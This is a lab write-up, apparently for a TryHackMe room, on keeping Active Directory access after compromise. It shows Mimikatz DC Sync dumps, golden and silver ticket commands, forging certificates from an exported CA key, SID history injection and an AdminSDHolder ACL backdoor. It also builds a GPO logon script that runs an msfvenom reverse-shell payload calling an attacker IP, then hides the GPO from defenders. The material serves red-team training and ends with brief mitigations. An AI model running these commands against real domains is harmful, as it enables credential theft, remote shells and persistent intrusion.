
 

 
 
 
 

  

Persisting Active Directory 

Active Directory persistence techniques that can be used post-compro-
mise to ensure the blue team will not be able to kick you out during a red 
team exercise. 
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But..why persistence? 

During our attack against AD, we need to make sure that we deploy persistence. 
This will ensure that the blue team can't kick us out by simply rotating some 
credentials. I will use several techniques that can ensure our gained access cannot 
simply be revoked. These persistence techniques are dependent on the specific 
permissions and privileges we have acquired thus far. 

The goal then is to persist with near-privileged credentials. We don't always need 
the full keys to the kingdom; we just need enough keys to ensure we can still 
achieve goal execution and always make the blue team look over their shoulder. As 
such, we should attempt to persist through credentials such as the following: 

• Credentials that have local administrator rights on several machines. Usu-
ally, organisations have a group or two with local admin rights on almost all 
computers. These groups are typically divided into one for workstations and 
one for servers. By harvesting the credentials of members of these groups, we 
would still have access to most of the computers in the estate. 

• Service accounts that have delegation permissions. With these accounts, we 
would be able to force golden and silver tickets to perform Kerberos delega-
tion attacks. 

• Accounts used for privileged AD services. If we compromise accounts of privi-
leged services such as Exchange, Windows Server Update Services (WSUS), or 
System Center Configuration Manager (SCCM), we could leverage AD exploita-
tion to once again gain a privileged foothold. 

When it comes to what credentials to dump and persist through, it is subject to 
many things. You will have to get creative in your thinking and take it on a case-by-
case basis. However, for this room, we are going to have some fun, make the blue 
team sweat, and dump every single credential we can get our hands on! 
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1 Credentials 

First log into machine with ssh and load Mimikatz 

 

Let's start by performing a DC Sync of a single account, our own: 

 

 



5 
 

 

 

You will see quite a bit of output, including the current NTLM hash of your account. You can verify 
that the NTLM hash is correct by using a website such as this to transform your password into an 
NTLM hash.  

This is great and all, but we want to DC sync every single account. To do this, we will have to ena-
ble logging on Mimikatz: 

 

 

 

Now we can revocer all the usernames and NTLM hashes. We could also now perform pass the 

hash attack with Mimikatz. 

cat dcdump.txt | grep "Hash NTLM" 

NTLM hash was “16f9af38fca3ada405386b3b57366082” for user “krbtgt” 

https://codebeautify.org/ntlm-hash-generator
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2 Tickets 

 

Let's generate some Golden and Silver Tickets. You will need the NTLM hash of the KRBTGT ac-

count, which I have due to the DC Sync performed in the previous task 

 

 

 

 

Let’s load Mimikatz and generate a golden ticket. Parameters we need: 

/admin - The username we want to impersonate. This does not have to be a valid user. 
/domain - The FQDN of the domain we want to generate the ticket for. 
/id -The user RID. By default, Mimikatz uses RID 500, which is the default Administrator account 
RID.  
/sid -The SID of the domain we want to generate the ticket for. 
/krbtgt -The NTLM hash of the KRBTGT account. 
/endin - The ticket lifetime. By default, Mimikatz generates a ticket that is valid for 10 years. The 
default Kerberos policy of AD is 10 hours (600 minutes) 
/renewmax -The maximum ticket lifetime with renewal. By default, Mimikatz generates a ticket 
that is valid for 10 years. The default Kerberos policy of AD is 7 days (10080 minutes) 
/ptt - This flag tells Mimikatz to inject the ticket directly into the session, meaning it is ready to be 

used. 

 

Domain SID we got from previous Get-ADDomain command and NTLM hash from previous task 
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With all the information we can generate a golden ticket! 

 

kerberos::golden /admin:timosoini /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-

26 

93558621-2658995185  /krbtgt:16f9af38fca3ada405386b3b57366082  /endin:600 /renew-

max:10080 /ptt 

 

 

verify that the golden ticket is working by running the dir command against the domain controller 

 

 

 

And it works!  
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BUT Even if the golden ticket has an incredibly long time, 

the blue team can still defend against this by simply ro-

tating the KRBTGT password twice. 

 

If we really want to dig in our roots, we want to generate silver tickets, which are less likely to be 

discovered and significantly harder to defend against since the passwords of every machine ac-

count must be rotated.  

 

We can use the following Mimikatz command to generate a silver ticket: 

 

Parameters needed: 

/admin - The username we want to impersonate. This does not have to be a valid user. 

/domain - The FQDN of the domain we want to generate the ticket for. 

/id -The user RID. By default, Mimikatz uses RID 500, which is the default Administrator account 
RID.  

/sid -The SID of the domain we want to generate the ticket for. 

/target - The hostname of our target server. Let's do THMSERVER1.za.tryhackme.loc, but it can be 
any domain-joined host. 

/rc4 - The NTLM hash of the machine account of our target. Look through your DC Sync results for 
the NTLM hash of THMSERVER1$. The $ indicates that it is a machine account. 

/service - The service we are requesting in our TGS. CIFS is a safe bet, since it allows file access. 

/ptt - This flag tells Mimikatz to inject the ticket directly into the session, meaning it is ready to be 
used. 

 

kerberos::golden /admin:yhatimosoini /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-

3885271727 

-2693558621-2658995185  /target:THMSERVER1.za.tryhackme.loc  

/rc4:4c02d970f7b3da7f8ab6fa4dc77438f4  /serv 

ice:cifs /ptt 
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Success! We can verify that the silver ticket is working by running the dir command against 
THMSERVER1 

 

 

 

Now we have golden and silver tickets to the AD environment, providing better 
persistence than just credentials! 
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WARNING! The techniques discussed from this point for-

ward are incredibly invasive and hard to remove. In real-

world scenarios, the exploitation of most of these tech-

niques would result in a full domain rebuild.  

Even if you have signoff on your red team exercise to perform these techniques, you 

must take the utmost caution when performing these techniques.  

Make sure you fully understand the consequences of using these techniques and 

only perform them if you have prior approval on your assessment and they are 

deemed necessary. In most cases, a red team exercise would be dechained at this 

point instead of using these techniques. Meaning you would most likely not perform 

these persistence techniques but rather simulate them. 
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3 Certificates 

After last techniques defenders can ultimately rotate enough credentials to kick us out. So, we 

should look to use persistence techniques that are credential agnostic, meaning the rotation of 

these will not kick us out. The first of these we will be looking at is certificates. 

Let's first see if we can view the certificates stored on the DC: 

 

There is a CA certificate on the DC. Some of these certificates were set not to allow us to export 
the key. Without this private key, we would not be able to generate new certificates. Luckily, 
Mimikatz allows us to patch memory to make these keys exportable: 

 

 

 

With these services patched, we can use Mimikatz to export the certificates: 
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The exported certificates will be stored in both PFX and DER format to disk: 

 

 

 

The za-THMDC-CA.pfx certificate is the one we are particularly interested in. In order to export the 
private key, a password must be used to encrypt the certificate. By default, Mimikatz assigns the 
password of mimikatz 
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Download the file to local machine 

 

 

Now that we have the private key and root CA certificate, we can use the ForgeCert tool to forge a 
Client Authenticate certificate for any user we want. Let's use ForgeCert to generate a new certifi-
cate 

Parameters needed: 

CaCertPath - The path to our exported CA certificate. 

CaCertPassword - The password used to encrypt the certificate. By default, Mimikatz assigns the 
password of mimikatz. 

Subject - The subject or common name of the certificate. This does not really matter in the con-
text of what we will be using the certificate for. 

SubjectAltName - This is the User Principal Name (UPN) of the account we want to impersonate 
with this certificate. It has to be a legitimate user. 

NewCertPath - The path to where ForgeCert will store the generated certificate. 

NewCertPassword - Since the certificate will require the private key exported for authentication 
purposes, we must set a new password used to encrypt it. 

 

https://github.com/GhostPack/ForgeCert
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And it worked! We can use Rubeus to request a TGT using the certificate to verify that the certifi-
cate is trusted. We will use the following parameters: 

/user - This specifies the user that we will impersonate and has to match the UPN for the certifi-
cate we generated 

/enctype -This specifies the encryption type for the ticket. Setting this is important for evasion, 
since the default encryption algorithm is weak, which would result in an overpass-the-hash alert 

/certificate - Path to the certificate we have generated 

/password - The password for our certificate file 

/outfile - The file where our TGT will be output to 

/domain - The FQDN of the domain we are currently attacking 

/dc - The IP of the domain controller which we are requesting the TGT from. Usually, it is best to 
select a DC that has a CA service running 

 

C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: 
/domain:za.tryhackme.loc /dc: 
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TGT request was successful and saved. 

 

Now we can use Mimikatz to load the TGT and authenticate to THMDC: 

 

And we can verify it works: 
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Certificate persistence is significantly harder to defend against. Even if you rotate 
the credentials of the compromised account, the certificate will still be valid. The 
only way to remove the persistence is to issue a revocation of the certificate. How-
ever, this would only be possible if we generated the certificate through legitimate 
channels.  

So what's the only solution to remove the persistence? Well... 

Since we exported the CA and generated the certificate our-
selves, it does not appear on AD CS's list of issued certificates, 
meaning the blue team will not be able to revoke our certifi-
cate.  

This is why we are no longer friends. They will have to revoke 
the root CA certificate. But revoking this certificate means that 
all certificates issued by AD CS would suddenly be invalid. 
Meaning they will have to generate a new certificate for every 
system that uses AD CS.  

You should start to see why this type of persistence is incredibly dangerous and 
would require full rebuilds of systems if performed. 
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4 SID History 

The legitimate use case of SID history is to enable access for an account to effectively be cloned to 

another. This becomes useful when an organization is busy performing an AD migration as it al-

lows users to retain access to the original domain while they are being migrated to the new one. In 

the new domain, the user would have a new SID, but we can add the user's existing SID in the SID 

history, which will still allow them to access resources in the previous domain using their new ac-

count. While SID history is good for migrations, attacker can also abuse this feature for persis-

tence. 

Since the SIDs are added to the user's token, privileges would be respected even if the account is 

not a member of the actual group. Making this a very sneaky method of persistence 

let's make sure that our low-privilege user does not currently have any information in their SID his-

tory

 

This confirms that our user does not currently have any SID History set. Let's get the SID of the Do-
main Admins group since this is the group, we want to add to our SID History: 
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The NTDS database is locked when the NTDS service is running. In order to patch our SID history, 
we must first stop the service. You must restart the NTDS service after the patch, otherwise, au-
thentication for the entire network will not work anymore. 

 
Stop-Service -Name ntds -force  
 
Add-ADDBSidHistory -SamAccountName 'grace.clarke' -SidHistory 'S-1-5-21-3885271727-

2693558621-2658995185-512' -DatabasePath C:\Windows\NTDS\ntds.dit 

Start-Service -Name ntds   
 
 
let's SSH into THMWRK1 with our low-privileged credentials and verify that the SID history was 

added and that we now have Domain Admin privileges! 

 

We were able to forge our SID History, granting our low-privileged account DA access! 
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None of the regular tools will tell you that something is wrong. 
That user will not all of a sudden pop up as a member of the Do-
main Admins group. So unless you are actively filtering through 
the attributes of your users, this is incredibly hard to find. This is 
because the SID history is only applied and used once the user 
authenticates. 

Imagine that you are the blue team dealing with an incident 
where you have just performed a domain takeback. You rotated 
the krbtgt account's password twice, removed golden and silver 
tickets, and rebuilt your entire CA server from scratch, just to see 
that the attacker is still performing DA commands with a low-
privileged account. This would not be a great day. 
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5 ACL 

 

In order to ensure a bit better persistence and make the blue team scratch their heads, we should 

rather inject into the templates that generate the default groups. By injecting into these tem-

plates, even if they remove our membership, we just need to wait until the template refreshes, 

and we will once again be granted membership. 

One such template is the AdminSDHolder container. This container exists in every AD domain, and 

its Access Control List (ACL) is used as a template to copy permissions to all protected groups. Pro-

tected groups include privileged groups such as Domain Admins, Administrators, Enterprise Ad-

mins, and Schema Admins. 

A process called SDProp takes the ACL of the AdminSDHolder container and applies it to all pro-

tected groups every 60 minutes. We can thus write an ACE that will grant us full permissions on all 

protected groups. If the blue team is not aware that this type of persistence is being used, it will 

be quite frustrating. Every time they remove the inappropriate permission on the protected object 

or group, it reappears within the hour. Since this reconstruction occurs through normal AD pro-

cesses, it would also not show any alert to the blue team, making it harder to pinpoint the source 

the persistence. 
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In order to deploy our persistence to the AdminSDHolder, we will use Microsoft Management Con-

sole (MMC). To avoid kicking users out of their RDP sessions, it will be best to RDP into THMWRK1 

using your low privileged credentials, use the runas command to inject the Administrator creden-

tials, and then execute MMC from this new terminal: 

runas /netonly /user:Administrator cmd.exe 

Once you have an MMC window, add the Users and Groups Snap-in (File->Add Snap-In->Active Di-

rectory Users and Groups). Make sure to enable Advanced Features (View->Advanced Features). 

We can find the AdminSDHolder group under Domain -> System. Then navigate to the Security of 

the group (Right-click->Properties->Security) 

 

 

 

 

 

 

 

 

 

 

 

 

Let's add our low-privileged user and grant Full Control: 

Click Add -> Search for your low-privileged username and click Check Names -> Click OK -> Click   

Allow on Full Control -> Click Apply -> Click OK 
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It should look something like this: 

 

 

Now we just need to wait 60 minutes, and our user will have full control over all Protected Groups. 

This is because the Security Descriptor Propagator (SDProp) service executes automatically every 

60 minutes and will propagate this change to all Protected Groups.  

Then review the security permissions of a Protected Group such as the Domain Admins group. 

As can be seen, our low privilege user has full control over the group. Interestingly, although we 

have permissions to modify the group, it does not automatically add us to the group: 
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However, using our new permissions, we can add ourselves to this group: 

 

 

 

 

Imagine combining this with the nesting groups of the previous task. Just as the blue team finished 

revoking your access through numerous group changes, 60 minutes later, you can just do it all 

again. Unless the blue team understands that the permissions are being altered through the Ad-

minSDHolder group, they would be scratching their heads every 60 minutes. Since the persistence 

propagates through a legitimate AD service, they would most likely be none the wiser every time it 

happens. If you really want to persist, you can grant full control to the Domain Users group in the 

AdminSDHolder group, which means any low-privileged user would be granted full control over all 

Protected Groups. Combining this with a full DC Sync means the blue team will have to reset every 

single credential in the domain to flush us out completely. 
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6 GPO 

GPOs are also excellent for deploying persistence. 

Group Policy Management in AD provides a central mechanism to manage the local policy configu-
ration of all domain-joined machines. This includes configuration such as membership to restricted 
groups, firewall and AV configuration, and which scripts should be executed upon startup. While 
this is an excellent tool for management, it can be targeted by attackers to deploy persistence 
across the entire estate. What is even worse is that the attacker can often hide the GPO in such a 
way that it becomes almost impossible to remove it. 

While having access to all hosts are nice, it can be even better by ensuring we get access to them 

when administrators are actively working on them. To do this, we will create a GPO that is linked 

to the Admins OU, which will allow us to get a shell on a host every time one of them authenti-

cates to a host. 

We first need to create our shell, listener, and the actual bat file that will execute our shell 

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.50.84.38 lport=4445 -f exe > 

am03_shell.exe 

script called am03_script.bat: 

copy \\za.tryhackme.loc\sysvol\za.tryhackme.loc\scripts\am03_shell.exe 
C:\tmp\<username>_shell.exe && timeout /t 20 && C:\tmp\am03_shell.exe 

script executes three commands chained together with &&. The script will copy the binary from 
the SYSVOL directory to the local machine, then wait 20 seconds, before finally executing the bi-
nary 

 

We can use SCP and our Administrator credentials to copy both scripts to the SYSVOL directory: 

scp am03_shell.exe za\\Administrator@thmdc.za.tryhackme.loc:C:/Win-
dows/SYSVOL/sysvol/za.tryhackme.loc/scripts/ 
 
scp am03_script.bat za\\Administrator@thmdc.za.tryhackme.loc:C:/Win-
dows/SYSVOL/sysvol/za.tryhackme.loc/scripts/ 
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With our prep now complete, we can create the GPO that will execute it. We will write a GPO that 
will be applied to all Admins, so right-click on the Admins OU and select Create a GPO in this do-
main and link it here. 

 

 
 
Let's get back to our Group Policy Management Editor: 

Under User Configuration, expand Policies->Windows Settings. 

Select Scripts (Logon/Logoff). 

Right-click on Logon->Properties 

Select the Scripts tab. 

Click Add->Browse. 

navigate to where we stored our Batch and binary files 

Select your Batch file as the script and click Open and OK. Click Apply and OK. This will now ensure 

that every time one of the administrators (tier 2, 1, and 0) logs into any machine, we will get a 

callback. 
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Now that we know that our persistence is working, it is time to make sure the blue team can't 

simply remove our persistence. 

 

Right-Click on ENTERPRISE DOMAIN CONTROLLERS and select Edit settings, delete, modify secu-

rity. 

Click on all other groups (except Authenticated Users) and click Remove. 

You should be left with delegation that looks like this: 
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Click on Advanced and remove the Created Owner from the permissions: 

 

By default, all authenticated Users must have the ability to read the policy. This is required be-
cause otherwise, the policy could not be read by the user's account when they authenticate to ap-
ply User policies. If we did not have our logon script, we could also remove this permission to 
make sure that almost no one would be able to read our Policy.  

We could replace Authenticated Users with Domain Computers to ensure that computers can still 
read and apply the policy but prevent any user from reading the policy. There is no going back af-
ter this. 

 

Click Add. 

Type Domain Computers, click Check Names and then OK. 

Select Read permissions and click OK. 

Click on Authenticated Users and click Remove. 

Right after you perform these steps, you will get an error that you can no longer read your own 
policy: 
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Even with the highest level of permissions, the blue team would not be able to remove our GPO 

unless they impersonated the machine account of a Domain Controller. This makes it extra hard to 

firstly discover, and even if they discover the GPO, it would be incredibly hard to remove. We 

don't even have the required permissions to interface with our policy anymore, so one will have to 

stay there until a network reset is performed. 
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7 Mitigations 

 

  

AD persistence can be a pain to defend against. In certain cases, the persistence can be so deeply 
rooted that a complete domain rebuild is required. However, there are a couple of things that we 
can do to detect deployed persistence: 

• Anomalous account logon events are the most common alert for persistence. Any time cre-
dentials break the tiering model, it can be as a result of persistence. 

• For each of the persistence techniques mentioned, specific detection rules can be written, 
such as cases when a machine account's password changes, ACLs are permissively updated, 
or new GPOs are created.  

• The best defence against persistence is to protect privileged resources. Although low privi-
leged access can be used to deploy persistence, the truly scary techniques only become 
available once an attacker has acquired privileged access to the domain. 

 


